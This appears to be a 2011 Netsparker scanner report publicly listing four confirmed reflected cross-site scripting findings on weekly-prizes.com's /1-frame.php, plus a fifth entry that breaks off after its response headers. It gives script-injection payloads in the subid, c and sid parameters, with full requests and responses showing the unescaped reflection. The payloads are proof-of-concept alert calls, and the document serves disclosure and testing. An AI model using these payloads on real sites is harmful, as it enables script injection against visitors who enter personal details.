XSS, Cross Site Scripting, CWE-79, CAPEC-86, DORK Report with Netsparker 1.8.3.3, weekly-prizes.com

- /1-frame.php

/1-frame.php CONFIRMED

http://weekly-prizes.com/1-frame.php?subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter	Type	Value
subid	GET	'"--></style></script><script>alert(0x000049)</script>

Request

GET /1-frame.php?subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000049)%3C/script%3E HTTP/1.1
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7476
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><script src="http://cdn.weekly-prizes.com/include/gen_validatorv4.js" type="text/javascript"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Your Prize... One Moment Please</title><style type="text/css">a { font-size: 12px; color: #333;}a:link { color: #999;}a:visited { color: #999;}a:hover { color: #999;}a:active { color: #999;}#submitbutton { margin-top: 30px; width: 300px; text-align: center; font-size: 18px; } .field { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; text-align:center; } .fieldtext { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; }input.btn1 {color:#000border-color:#000 #000 #000 #000;background-color:#0C0;border: 1px solid;}</style><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/jquery1.5.0.js"></script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/autotab.js"></script></head><body onload="document.info.firstname.focus();"><center><img src="http://cdn.weekly-prizes.com/img/contactinfo.png" /><br /><br /></center><center><form name="info" id="info" action="reserving.php" method="get"><table border="0"><tbody><tr><td width="115">First Name: </td><td width="220"><input name="firstname" id="firstname" class="fieldtext" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorfirstname" style="display: none;">Not a Valid First Name</div></font></b></td></tr><tr><td>Last Name:</td><td><input name="lastname" class="fieldtext" id="lastname" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr> <td>E-Mail:</td> <td><input name="email" id="email" type="text" class="fieldtext" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'" size="30" maxlength="40" /></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorlastname" style="display: none;">Not a Valid Last Name</div></font></b></td></tr><tr><td class="label">Mobile Number:</td><td class="input" style="font-size:16px;"><input type='text' class="field" id='cphone1' name='cphone1' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone2' name='cphone2' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone3' name='cphone3' value='' maxlength='4' style='width: 57px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td><td width="0"><div id="4" class="error"></div></td> </tr><tr> <td colspan="2" align="left"></td></tr><tr> <td colspan="2" align="left"> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td><label style="padding: 2px"><input name="gametester" type="checkbox" id="gametester" value="1" /> I am interested being a paid video game tester from home.</label></td> </tr> <tr> <td><label style="padding: 2px"><input name="coreg_10" type="checkbox" id="coreg_10" value="1" /> I am interested in grants from the US Government</label></td> </tr> </table> </td></tr><tr><td colspan="2" align="center" valign="top"><input name="subid" type="hidden" id="subid" value="\'\"--></style></script><script>netsparker(0x000049)</script>" /><input name="c" type="hidden" id="c" value="" /><input name="sid" type="hidden" id="sid" value="" /><input name="tt" type="hidden" id="tt" value="0" /><input value="Click Here To Continue" id="submitbutton" type="submit"></td></tr></tbody></table></form> <script type="text/javascript"> var frmvalidator = new Validator("info"); frmvalidator.addValidation("firstname","req","Please enter your First Name so we know who to send the prize to."); frmvalidator.addValidation("firstname","maxlen=20", "Max length for FirstName is 20"); frmvalidator.addValidation("lastname","req","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("lastname","maxlen=20","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("email","maxlen=50","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","req","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","email","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("cphone1","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone1","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","minlen=4","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings.");$(document).ready(function(){$('#cphone1').autotab({target:$('#cphone2'), format:'numeric'});$('#cphone2').autotab({target:$('#cphone3'), format:'numeric'});$('#cphone3').autotab_filter({format:'numeric'});});</script><br /> <br /> <br /> <br /> <br /> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="privacy.php" target="_blank">Privacy Policy</a></td> </tr></table></center></body></html>

- /1-frame.php

/1-frame.php CONFIRMED

http://weekly-prizes.com/1-frame.php?c='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FB)..

Parameters

Parameter	Type	Value
c	GET	'"--></style></script><script>alert(0x0000FB)</script>
coreg_10	GET	1
cphone1	GET	3
cphone2	GET	3
cphone3	GET	3
email	GET	netsparker@example.com
firstname	GET	Ronald Smith
gametester	GET	1
lastname	GET	Ronald Smith
sid	GET	3
subid	GET	3
tt	GET	0

Request

GET /1-frame.php?c='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FB)%3C/script%3E&coreg_10=1&cphone1=3&cphone2=3&cphone3=3&email=netsparker@example.com&firstname=Ronald%20Smith&gametester=1&lastname=Ronald%20Smith&sid=3&subid=3&tt=0 HTTP/1.1
Referer: http://weekly-prizes.com/1-frame.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7478
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><script src="http://cdn.weekly-prizes.com/include/gen_validatorv4.js" type="text/javascript"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Your Prize... One Moment Please</title><style type="text/css">a { font-size: 12px; color: #333;}a:link { color: #999;}a:visited { color: #999;}a:hover { color: #999;}a:active { color: #999;}#submitbutton { margin-top: 30px; width: 300px; text-align: center; font-size: 18px; } .field { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; text-align:center; } .fieldtext { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; }input.btn1 {color:#000border-color:#000 #000 #000 #000;background-color:#0C0;border: 1px solid;}</style><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/jquery1.5.0.js"></script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/autotab.js"></script></head><body onload="document.info.firstname.focus();"><center><img src="http://cdn.weekly-prizes.com/img/contactinfo.png" /><br /><br /></center><center><form name="info" id="info" action="reserving.php" method="get"><table border="0"><tbody><tr><td width="115">First Name: </td><td width="220"><input name="firstname" id="firstname" class="fieldtext" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorfirstname" style="display: none;">Not a Valid First Name</div></font></b></td></tr><tr><td>Last Name:</td><td><input name="lastname" class="fieldtext" id="lastname" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr> <td>E-Mail:</td> <td><input name="email" id="email" type="text" class="fieldtext" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'" size="30" maxlength="40" /></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorlastname" style="display: none;">Not a Valid Last Name</div></font></b></td></tr><tr><td class="label">Mobile Number:</td><td class="input" style="font-size:16px;"><input type='text' class="field" id='cphone1' name='cphone1' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone2' name='cphone2' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone3' name='cphone3' value='' maxlength='4' style='width: 57px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td><td width="0"><div id="4" class="error"></div></td> </tr><tr> <td colspan="2" align="left"></td></tr><tr> <td colspan="2" align="left"> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td><label style="padding: 2px"><input name="gametester" type="checkbox" id="gametester" value="1" /> I am interested being a paid video game tester from home.</label></td> </tr> <tr> <td><label style="padding: 2px"><input name="coreg_10" type="checkbox" id="coreg_10" value="1" /> I am interested in grants from the US Government</label></td> </tr> </table> </td></tr><tr><td colspan="2" align="center" valign="top"><input name="subid" type="hidden" id="subid" value="3" /><input name="c" type="hidden" id="c" value="\'\"--></style></script><script>netsparker(0x0000FB)</script>" /><input name="sid" type="hidden" id="sid" value="3" /><input name="tt" type="hidden" id="tt" value="0" /><input value="Click Here To Continue" id="submitbutton" type="submit"></td></tr></tbody></table></form> <script type="text/javascript"> var frmvalidator = new Validator("info"); frmvalidator.addValidation("firstname","req","Please enter your First Name so we know who to send the prize to."); frmvalidator.addValidation("firstname","maxlen=20", "Max length for FirstName is 20"); frmvalidator.addValidation("lastname","req","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("lastname","maxlen=20","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("email","maxlen=50","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","req","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","email","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("cphone1","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone1","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","minlen=4","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings.");$(document).ready(function(){$('#cphone1').autotab({target:$('#cphone2'), format:'numeric'});$('#cphone2').autotab({target:$('#cphone3'), format:'numeric'});$('#cphone3').autotab_filter({format:'numeric'});});</script><br /> <br /> <br /> <br /> <br /> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="privacy.php" target="_blank">Privacy Policy</a></td> </tr></table></center></body></html>

- /1-frame.php

/1-frame.php CONFIRMED

http://weekly-prizes.com/1-frame.php?subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter	Type	Value
subid	GET	'"--></style></script><script>alert(0x000108)</script>
sid	GET	3
c	GET	us
tt	GET	3

Request

GET /1-frame.php?subid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000108)%3C/script%3E&sid=3&c=us&tt=3 HTTP/1.1
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7479
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><script src="http://cdn.weekly-prizes.com/include/gen_validatorv4.js" type="text/javascript"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Your Prize... One Moment Please</title><style type="text/css">a { font-size: 12px; color: #333;}a:link { color: #999;}a:visited { color: #999;}a:hover { color: #999;}a:active { color: #999;}#submitbutton { margin-top: 30px; width: 300px; text-align: center; font-size: 18px; } .field { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; text-align:center; } .fieldtext { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; }input.btn1 {color:#000border-color:#000 #000 #000 #000;background-color:#0C0;border: 1px solid;}</style><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/jquery1.5.0.js"></script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/autotab.js"></script></head><body onload="document.info.firstname.focus();"><center><img src="http://cdn.weekly-prizes.com/img/contactinfo.png" /><br /><br /></center><center><form name="info" id="info" action="reserving.php" method="get"><table border="0"><tbody><tr><td width="115">First Name: </td><td width="220"><input name="firstname" id="firstname" class="fieldtext" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorfirstname" style="display: none;">Not a Valid First Name</div></font></b></td></tr><tr><td>Last Name:</td><td><input name="lastname" class="fieldtext" id="lastname" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr> <td>E-Mail:</td> <td><input name="email" id="email" type="text" class="fieldtext" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'" size="30" maxlength="40" /></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorlastname" style="display: none;">Not a Valid Last Name</div></font></b></td></tr><tr><td class="label">Mobile Number:</td><td class="input" style="font-size:16px;"><input type='text' class="field" id='cphone1' name='cphone1' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone2' name='cphone2' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone3' name='cphone3' value='' maxlength='4' style='width: 57px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td><td width="0"><div id="4" class="error"></div></td> </tr><tr> <td colspan="2" align="left"></td></tr><tr> <td colspan="2" align="left"> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td><label style="padding: 2px"><input name="gametester" type="checkbox" id="gametester" value="1" /> I am interested being a paid video game tester from home.</label></td> </tr> <tr> <td><label style="padding: 2px"><input name="coreg_10" type="checkbox" id="coreg_10" value="1" /> I am interested in grants from the US Government</label></td> </tr> </table> </td></tr><tr><td colspan="2" align="center" valign="top"><input name="subid" type="hidden" id="subid" value="\'\"--></style></script><script>netsparker(0x000108)</script>" /><input name="c" type="hidden" id="c" value="us" /><input name="sid" type="hidden" id="sid" value="3" /><input name="tt" type="hidden" id="tt" value="0" /><input value="Click Here To Continue" id="submitbutton" type="submit"></td></tr></tbody></table></form> <script type="text/javascript"> var frmvalidator = new Validator("info"); frmvalidator.addValidation("firstname","req","Please enter your First Name so we know who to send the prize to."); frmvalidator.addValidation("firstname","maxlen=20", "Max length for FirstName is 20"); frmvalidator.addValidation("lastname","req","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("lastname","maxlen=20","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("email","maxlen=50","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","req","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","email","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("cphone1","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone1","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","minlen=4","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings.");$(document).ready(function(){$('#cphone1').autotab({target:$('#cphone2'), format:'numeric'});$('#cphone2').autotab({target:$('#cphone3'), format:'numeric'});$('#cphone3').autotab_filter({format:'numeric'});});</script><br /> <br /> <br /> <br /> <br /> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="privacy.php" target="_blank">Privacy Policy</a></td> </tr></table></center></body></html>

- /1-frame.php

/1-frame.php CONFIRMED

http://weekly-prizes.com/1-frame.php?subid=154&sid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..

Parameters

Parameter	Type	Value
subid	GET	154
sid	GET	'"--></style></script><script>alert(0x000129)</script>
c	GET	us
tt	GET	3

Request

GET /1-frame.php?subid=154&sid='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000129)%3C/script%3E&c=us&tt=3 HTTP/1.1
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.10
X-Powered-By: PHP/5.2.10
Content-Length: 7481
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><script src="http://cdn.weekly-prizes.com/include/gen_validatorv4.js" type="text/javascript"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Reserving Your Prize... One Moment Please</title><style type="text/css">a { font-size: 12px; color: #333;}a:link { color: #999;}a:visited { color: #999;}a:hover { color: #999;}a:active { color: #999;}#submitbutton { margin-top: 30px; width: 300px; text-align: center; font-size: 18px; } .field { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; text-align:center; } .fieldtext { border: solid 1px #979797; width: 210px; padding: 7px; font-size: 16px; margin-bottom: 5px; }input.btn1 {color:#000border-color:#000 #000 #000 #000;background-color:#0C0;border: 1px solid;}</style><script type='text/javascript'>var _vis_opt_account_id = 2351;var _vis_opt_protocol = (('https:' == document.location.protocol) ? 'https://' : 'http://');document.write('<s' + 'cript src="' + _vis_opt_protocol + 'dev.visualwebsiteoptimizer.com/deploy/js_visitor_settings.php?v=1&a='+_vis_opt_account_id+'&url='+encodeURIComponent(document.URL)+'&random='+Math.random()+'" type="text/javascript">' + '<\/s' + 'cript>');</script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean") { document.write('<s' + 'cript src="' + _vis_opt_protocol + 'd5phz18u4wuww.cloudfront.net/vis_opt.js" type="text/javascript">' + '<\/s' + 'cript>'); }// if your site already has jQuery 1.4.2, replace vis_opt.js with vis_opt_no_jquery.js above </script><script type='text/javascript'>if(typeof(_vis_opt_settings_loaded) == "boolean" && typeof(_vis_opt_top_initialize) == "function"){ _vis_opt_top_initialize(); vwo_$(document).ready(function() { _vis_opt_bottom_initialize(); }); }</script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/jquery1.5.0.js"></script><script type="text/javascript" src="http://cdn.weekly-prizes.com/include/autotab.js"></script></head><body onload="document.info.firstname.focus();"><center><img src="http://cdn.weekly-prizes.com/img/contactinfo.png" /><br /><br /></center><center><form name="info" id="info" action="reserving.php" method="get"><table border="0"><tbody><tr><td width="115">First Name: </td><td width="220"><input name="firstname" id="firstname" class="fieldtext" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorfirstname" style="display: none;">Not a Valid First Name</div></font></b></td></tr><tr><td>Last Name:</td><td><input name="lastname" class="fieldtext" id="lastname" maxlength="40" size="30" type="text" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td></tr><tr> <td>E-Mail:</td> <td><input name="email" id="email" type="text" class="fieldtext" onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'" size="30" maxlength="40" /></td></tr><tr><td></td><td><b><font color="#ff0000"><div id="errorlastname" style="display: none;">Not a Valid Last Name</div></font></b></td></tr><tr><td class="label">Mobile Number:</td><td class="input" style="font-size:16px;"><input type='text' class="field" id='cphone1' name='cphone1' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone2' name='cphone2' value='' maxlength='3' style='width: 50px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"> <input type='text' class="field" id='cphone3' name='cphone3' value='' maxlength='4' style='width: 57px;' onfocus="this.style.backgroundColor='#F5ED62'" onblur="this.style.backgroundColor='#FFF'"></td><td width="0"><div id="4" class="error"></div></td> </tr><tr> <td colspan="2" align="left"></td></tr><tr> <td colspan="2" align="left"> <table width="100%" border="0" cellspacing="10" cellpadding="0"> <tr> <td><label style="padding: 2px"><input name="gametester" type="checkbox" id="gametester" value="1" /> I am interested being a paid video game tester from home.</label></td> </tr> <tr> <td><label style="padding: 2px"><input name="coreg_10" type="checkbox" id="coreg_10" value="1" /> I am interested in grants from the US Government</label></td> </tr> </table> </td></tr><tr><td colspan="2" align="center" valign="top"><input name="subid" type="hidden" id="subid" value="154" /><input name="c" type="hidden" id="c" value="us" /><input name="sid" type="hidden" id="sid" value="\'\"--></style></script><script>netsparker(0x000129)</script>" /><input name="tt" type="hidden" id="tt" value="0" /><input value="Click Here To Continue" id="submitbutton" type="submit"></td></tr></tbody></table></form> <script type="text/javascript"> var frmvalidator = new Validator("info"); frmvalidator.addValidation("firstname","req","Please enter your First Name so we know who to send the prize to."); frmvalidator.addValidation("firstname","maxlen=20", "Max length for FirstName is 20"); frmvalidator.addValidation("lastname","req","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("lastname","maxlen=20","Please enter your Last Name so we know who to send the prize to."); frmvalidator.addValidation("email","maxlen=50","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","req","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("email","email","Please enter your E-mail so we can contact you about your prize."); frmvalidator.addValidation("cphone1","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone1","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","minlen=3","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone2","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","minlen=4","Please enter your Mobile Cell Phone number so we can contact you about your winnings."); frmvalidator.addValidation("cphone3","numeric","Please enter your Mobile Cell Phone number so we can contact you about your winnings.");$(document).ready(function(){$('#cphone1').autotab({target:$('#cphone2'), format:'numeric'});$('#cphone2').autotab({target:$('#cphone3'), format:'numeric'});$('#cphone3').autotab_filter({format:'numeric'});});</script><br /> <br /> <br /> <br /> <br /> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><a href="privacy.php" target="_blank">Privacy Policy</a></td> </tr></table></center></body></html>

- /1-frame.php

/1-frame.php CONFIRMED

http://weekly-prizes.com/1-frame.php?subid=154&sid=3&c='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter	Type	Value
subid	GET	154
sid	GET	3
c	GET	'"--></style></script><script>alert(0x000146)</script>
tt	GET	3

Request

GET /1-frame.php?subid=154&sid=3&c='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000146)%3C/script%3E&tt=3 HTTP/1.1
Referer: http://weekly-prizes.com/1.php?c=us&subid=154
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: weekly-prizes.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:21:47 GMT
